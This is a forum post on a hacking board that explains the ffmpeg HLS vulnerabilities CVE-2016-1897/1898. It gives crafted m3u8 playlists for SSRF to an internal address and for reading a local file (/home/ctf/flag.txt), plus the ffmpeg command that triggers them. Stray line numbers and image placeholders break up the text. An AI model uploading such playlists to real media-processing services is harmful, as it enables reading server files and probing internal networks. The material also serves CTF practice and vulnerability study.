Jump to content

Title: ffmpeg arbitrary file read vulnerability/SSRF vulnerability

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)

In FFMpeg2.X Due to improper handling of HTTP Live Streaming streaming m3u8 files, it can lead to SSRF vulnerabilities with arbitrary file reading vulnerabilities. This vulnerability is triggered when a website allows users to upload multimedia files and process them using FFMpeg.

This vulnerability has two CVE numbers, namely CVE-2016-1897 and CVE-2016-1898. The difference between them is the number of lines to read the file. CVE-2016-1897 can only read the first line of the file, while CVE-2016-1898 can read any line of the file. The principle is basically the same, so let's analyze it together here.

HLS(HTTP Live Streaming)

Since the vulnerability occurs when parsing HLS streaming files, we must first understand HLS.

HLS (HTTP Live Streaming) is a streaming communication protocol based on the HTTP protocol developed by Apple. Most of them are used on PCs and iPhones. Its basic principle is to divide a video stream into many small, small, and small ts stream files, and then download it through HTTP, downloading a little bit at a time. When starting a new streaming session, the client will first download an m3u8 (playlist Playlist) file, which contains all the data of this HLS session.

http://pl.youku.com/playlist/m3u8?vid=340270152type=3gphdts=1462714824keyframe=0ep=dSaSGE6MUssC5ybeiz8bYiXiIiZdXP0O9h2CgdNnAtQnS%2Bm2sid=746271452251312590fabtoken=3319ctype=12ev=1oip=3395898128

This is the m3u8 file of a video for youku, the content is as follows:

#EXTM3U

#EXT-X-TARGETDURATION:6

#EXT-X-VERSION:2

#EXTINF:6,

http://183.60.145.83/69777D60D183E7FE8D0BC25A4/030002010056208D059E4E15049976CD642E01-C8E5-706F-DC6D-375DE0DA5A1E.flv.ts?ts_start=0ts_end=5.9ts_seg_no=0ts_keyframe=1

#EXTINF:0,

http://183.60.145.83/69777D60D183E7FE8D0BC25A4/030002010056208D059E4E15049976CD642E01-C8E5-706F-DC6D-375DE0DA5A1E.flv.ts?ts_start=5.9ts_end=6.367ts_seg_no=1ts_keyframe=1

#EXT-X-ENDLIST

Analysis:

The #EXTM3U tag is the file header of m3u8, and this line must be used at the beginning.

#EXT-X-TARGETDURATION indicates the length of the entire media. Here is 6 seconds

#EXT-X-VERSION:2 This tag is optional

#EXTINF:6, indicates the length of this TS stream file

#EXT-X-ENDLIST This is equivalent to the end of the file

These are the most basic tags of m3u8, and the problem lies in the fact that when FFMpeg requests TS stream files, since we can forge an m3u8 file, FFMpeg will not judge the stream address inside and directly request it.

漏洞原理

SSRF vulnerability:

Directly use FFMpeg to parse a multimedia file

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:10.0,http://192.168.123.100:8080/1.html

#EXT-X-ENDLIST

(No one must exist for #EXT-X-MEDIA-SEQUENCE or #EXT-X-TARGETDURATION. The former is the serial number of the ts stream file. If you remove it, you will report an error: invalid file)

20190611164804.png-water_print

ffmpeg -i test.m3u8 test.mp4 (can also change the m3u8 format to other suffixes, ffmpeg will automatically be recognized as an HLS stream file)

20190611164804.png-water_print

The following ways can read file :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

#EXTM3U

#EXT-X-TARGETDURATION:1

#EXTINF:1,

/home/ctf/flag.txt

#EXT-X-ENDLIST

#EXTM3U

#EXT-X-PLAYLIST-TYPE:VOD

#EXT-X-TARGETDURATION:1

#EXT-X-VERSION:3

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:10.0,

file:///home/ctf/flag.txt

#EXT-X-ENDLIST

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.